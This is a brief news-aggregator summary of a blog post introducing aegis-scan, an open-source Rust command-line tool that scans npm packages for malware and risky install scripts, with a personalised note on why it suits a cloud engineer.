I built an npm malware scanner in Rust because npm audit isn't enough
Scored daily by a customisable AI persona to surface the most relevant engineering leadership news.
Open-source Rust CLI scanner detects malicious npm packages before installation.
aegis-scan is a Rust CLI that locally scans npm packages for malware using AST analysis (tree-sitter), install script inspection, and OSV.dev CVE checks, assigning a 0-10 risk score. It detects obfuscated eval, postinstall exploits, maintainer takeovers, AI-hallucination packages, and typosquatting, with CI integration via a GitHub Action.
Integrate aegis-scan into your GitHub Actions pipeline to automatically flag high-risk npm dependencies before they reach production.
As a senior engineer building cloud-native systems, npm supply chain vulnerabilities directly compromise your infrastructure, and aegis-scan provides a local, open-source scanner that integrates into CI without SaaS dependencies, aligning with your focus on secure developer tooling.